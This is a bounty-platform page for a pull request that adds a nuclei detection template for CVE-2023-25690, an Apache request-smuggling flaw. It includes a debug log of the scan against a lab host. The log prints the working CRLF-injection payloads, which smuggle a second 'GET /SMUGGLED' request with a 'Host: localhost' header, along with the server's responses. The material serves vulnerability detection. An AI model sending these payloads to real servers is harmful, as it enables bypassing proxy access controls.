🎉 Algora is now open source!Give us a star

PR
Add CVE-2023-25690
projectdiscovery/nuclei-templates#12458

Template / PR Information

Template Validation

I’ve validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Lab: https://github.com/oOCyginXOo/CVE-2023-25690-POC/tree/main/lab

Debug:

nuclei -u http://172.17.151.164/categories/1 -t .\http\cves\2023\CVE-2023-25690.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

                projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2023-25690] Dumped HTTP request for http://172.17.151.164/categories/1

GET /categories/1 HTTP/1.1
Host: 172.17.151.164
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2023-25690] Dumped HTTP response http://172.17.151.164/categories/1

HTTP/1.1 200 OK
Connection: close
Content-Length: 21
Content-Type: text/html; charset=UTF-8
Date: Mon, 23 Jun 2025 12:31:38 GMT
Server: Apache/2.4.54 (Debian)
X-Powered-By: PHP/7.4.33

You category ID is: 1
[INF] [CVE-2023-25690] Dumped HTTP request for http://172.17.151.164/categories/1+HTTP/1.1%0A%0AHost:+localhost%0D%0A%0D%0AGET+/SMUGGLED+HTTP/1.1

GET /categories/1%20HTTP/1.1%0A%0AHost:%20localhost%0D%0A%0D%0AGET%20/SMUGGLED%20HTTP/1.1 HTTP/1.1
Host: 172.17.151.164
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2023-25690] Dumped HTTP response http://172.17.151.164/categories/1+HTTP/1.1%0A%0AHost:+localhost%0D%0A%0D%0AGET+/SMUGGLED+HTTP/1.1

HTTP/1.1 400 Bad Request
Connection: close
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 23 Jun 2025 12:31:38 GMT
Server: Apache/2.4.54 (Debian)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 172.20.0.2 Port 8080</address>
</body></html>
[INF] [CVE-2023-25690] Dumped HTTP request for http://172.17.151.164/categories/1+HTTP/1.1%0D%0AHost:+localhost%0D%0A%0D%0AGET+/SMUGGLED+HTTP/1.1

GET /categories/1%20HTTP/1.1%0D%0AHost:%20localhost%0D%0A%0D%0AGET%20/SMUGGLED%20HTTP/1.1 HTTP/1.1
Host: 172.17.151.164
User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2023-25690] Dumped HTTP response http://172.17.151.164/categories/1+HTTP/1.1%0D%0AHost:+localhost%0D%0A%0D%0AGET+/SMUGGLED+HTTP/1.1

HTTP/1.1 200 OK
Connection: close
Content-Length: 21
Content-Type: text/html; charset=UTF-8
Date: Mon, 23 Jun 2025 12:31:38 GMT
Server: Apache/2.4.54 (Debian)
X-Powered-By: PHP/7.4.33

You category ID is: 1
[CVE-2023-25690:dsl-1] [http] [critical] http://172.17.151.164/categories/1%20HTTP/1.1%0D%0AHost:%20localhost%0D%0A%0D%0AGET%20/SMUGGLED%20HTTP/1.1
[INF] Scan completed in 14.3284ms. 1 matches found.

/claim #12455

Additional References:

Claim

Total prize pool $50
Total paid $0
Status Pending
Submitted June 23, 2025
Last updated June 23, 2025

Contributors

PS

pszyszkowski

@pszyszkowski

 100%

Sponsors

PR

ProjectDiscovery

@projectdiscovery

$50